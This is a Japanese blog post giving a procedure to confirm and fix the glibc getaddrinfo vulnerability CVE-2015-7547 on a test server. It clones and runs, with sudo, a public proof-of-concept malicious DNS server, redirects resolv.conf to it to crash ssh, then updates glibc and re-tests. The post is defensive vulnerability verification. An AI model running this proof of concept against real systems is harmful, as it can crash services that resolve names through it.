LoginSignup
8
7

More than 5 years have passed since last update.

@ftakao2007(san Fukui)

glibc ライブラリの脆弱性 (CVE-2015-7547) を上からなぞると確認できる手順

Last updated at Posted at 2016-02-18

概要

上からなぞれば脆弱性の確認と対応ができますが、検証環境で確認するための手順です。
サービス影響のあるサーバではやらないでください。

作業内容

### 検証用サーバにログイン
$ ssh (対象サーバ)

### 検証コードをclone
$ git clone https://github.com/fjserna/CVE-2015-7547.git

### 検証コード実行
$ sudo CVE-2015-7547/CVE-2015-7547-poc.py &

### 検証用の設定
$ sudo cp -ip /etc/resolv.conf /tmp/resolv.conf
$ sudo vi /etc/resolv.conf
================================================
nameserver 127.0.0.1
================================================

### テスト
$ ssh www.example.jp
================================================
[UDP] Total Data len recv 32
[UDP] Total Data len recv 32
Connected with 127.0.0.1:50788
[TCP] Total Data len recv 68
[TCP] Request1 len recv 32
[TCP] Request2 len recv 32
セグメンテーション違反です  <-これが出るとアウト
================================================

### resolv.confの設定を戻す
$ sudo cp -ip /tmp/resolv.conf /etc/resolv.conf

### updateする(2.12-1.166.el6_7.7以上になっていることを確認)
$ sudo yum update glibc

### OS再起動する
$ sudo shutdown -r now

### ログイン
$ ssh (対象サーバ)

### 検証コード実行
$ sudo CVE-2015-7547/CVE-2015-7547-poc.py &

### resolv.confの設定を入れる
$ sudo vi /etc/resolv.conf
================================================
nameserver 127.0.0.1
================================================

### テスト
$ ssh www.example.jp
================================================
[UDP] Total Data len recv 32
[UDP] Total Data len recv 32
Connected with 127.0.0.1:34103
[TCP] Total Data len recv 68
[TCP] Request1 len recv 32
[TCP] Request2 len recv 32
ssh: Could not resolve hostname www.example.jp: Name or service not known  <- 正常な出力
================================================

### resolv.confの設定を戻す
$ sudo cp -ip /tmp/resolv.conf /etc/resolv.conf

### 検証コードを停止する
$ fg
================================================
sudo CVE-2015-7547/CVE-2015-7547-poc.py
================================================
(Ctrl + Cを押す)
================================================
^CTraceback (most recent call last):
  File "CVE-2015-7547/CVE-2015-7547-poc.py", line 176, in <module>
    tcp_thread()
  File "CVE-2015-7547/CVE-2015-7547-poc.py", line 105, in tcp_thread
    conn, addr = sock_tcp.accept()
  File "/usr/lib64/python2.6/socket.py", line 197, in accept
    sock, addr = self._sock.accept()
KeyboardInterrupt
================================================
8
7
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
Sign upLogin
8
7